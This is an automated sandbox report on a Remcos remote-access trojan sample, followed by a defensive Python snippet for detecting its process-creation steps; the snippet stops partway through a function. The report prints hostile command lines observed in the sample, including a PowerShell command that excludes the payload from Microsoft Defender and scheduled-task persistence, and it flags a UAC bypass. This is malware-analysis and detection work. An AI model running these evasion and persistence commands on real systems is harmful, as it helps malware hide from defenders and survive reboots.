Source: Yara match | File source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vQyKfYxzXB.exe PID: 7932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0041A76C SystemParametersInfoW, 15_2_0041A76C

System Summary

Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_03133E28
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_0313E22C
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_03137019
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_076DDF29
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_076D6B60
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_076F4690
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_076F2948
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_076F8C78
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_076F5058
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_076F58C0
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_076F1578
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08D40E78
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08D40710
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08D41AD8
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08D45E48
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08D48410
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08EE11B0
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08EECBF0
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08EEBE08
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08EEC240
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08EE03B0
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08EEA328
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08EEA760
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_01443E28
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_0144E22C
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_01447019
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_072F0710
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_072F0E78
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_072F8410
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_072F5E48
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_0749A760
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_0749A328
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_0749C240
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_0749BE08
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_0749CBF0
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_075A1BB8
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00425152
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00435286
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_004513D4
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0045050B
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00436510
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_004316FB
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0043569E
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00443700
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_004257FB
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_004128E3
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00425964
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0041B917
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0043D9CC
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00435AD3
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00424BC3
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0043DBFB
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0044ABA9
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00433C0B
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00434D8A
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0043DE2A
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0041CEAF
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00435F08
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: String function: 00402073 appears 51 times
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: String function: 00432B90 appears 53 times
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: String function: 00432525 appears 41 times
Source: vQyKfYxzXB.exe, 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs vQyKfYxzXB.exe
Source: vQyKfYxzXB.exe, 00000000.00000002.1325611011.000000000767C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameZfva.exeZ vs vQyKfYxzXB.exe
Source: vQyKfYxzXB.exe, 00000000.00000002.1331795189.0000000009390000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs vQyKfYxzXB.exe
Source: vQyKfYxzXB.exe, 00000000.00000000.1282711365.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameZfva.exeZ vs vQyKfYxzXB.exe
Source: vQyKfYxzXB.exe, 00000000.00000002.1314848353.00000000033C2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs vQyKfYxzXB.exe
Source: vQyKfYxzXB.exe, 00000000.00000002.1326948045.0000000008EA0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs vQyKfYxzXB.exe
Source: vQyKfYxzXB.exe, 00000000.00000002.1313359631.000000000162E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs vQyKfYxzXB.exe
Source: vQyKfYxzXB.exe | Binary or memory string: OriginalFilenameZfva.exeZ vs vQyKfYxzXB.exe
Source: vQyKfYxzXB.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: vQyKfYxzXB.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RTdozXra.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@20/11@2/1
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | File created: C:\Users\user\AppData\Roaming\RTdozXra.exe
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Mutant created: \Sessions\1\BaseNamedObjects\46875-RPQWNM
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | File created: C:\Users\user\AppData\Local\Temp\tmp8902.tmp
Source: vQyKfYxzXB.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: vQyKfYxzXB.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | File read: C:\Users\user\Desktop\vQyKfYxzXB.exe
Source: unknown | Process created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Process created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Process created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"
Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Process created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\RTdozXra.exe C:\Users\user\AppData\Roaming\RTdozXra.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Process created: C:\Users\user\AppData\Roaming\RTdozXra.exe "C:\Users\user\AppData\Roaming\RTdozXra.exe"
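The process tree above shows the three host-side steps that matter for detection: a PowerShell child that adds a Defender exclusion for the dropped payload, a schtasks /Create whose task definition is read from an XML file in the user's Temp directory, and the dropper spawning its own image several times (the pattern a .NET loader leaves when it hollows a fresh copy of itself). The following Python is an added example, not code from the report or from Joe Sandbox, that turns those three observations into checks over process-creation events. The ProcEvent shape is an assumption (pid, parent pid, image path, command line, as a Sysmon Event ID 1 or Security 4688 record would give you); the sample events are constructed from the command lines in the report with made-up pids and three extra control rows. It goes slightly beyond the report in two places: it also decodes a -EncodedCommand argument before matching, and it accepts abbreviated -Exclusion* parameter names, since PowerShell binds unique prefixes.

```python
"""Checks for the defence-evasion and persistence steps in the process tree.
Added example; event shape and sample data are assumptions, not report data."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def encode_command(script: str) -> str:
    """Build a powershell.exe -EncodedCommand payload (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def expand_encoded(toks: list[str]) -> list[str]:
    """Replace '-EncodedCommand <b64>' with the decoded script's tokens."""
    for i, t in enumerate(toks):
        if t.lower() in ("-encodedcommand", "-ec", "-enc", "-e") and i + 1 < len(toks):
            try:
                script = base64.b64decode(toks[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return toks  # not a valid payload; match on the raw tokens instead
            return toks[:i] + tokenize(script)
    return toks


def defender_exclusion(ev: ProcEvent) -> str | None:
    """Return the path PowerShell was told to exclude from Defender, if any."""
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    toks = expand_encoded(tokenize(ev.cmdline))
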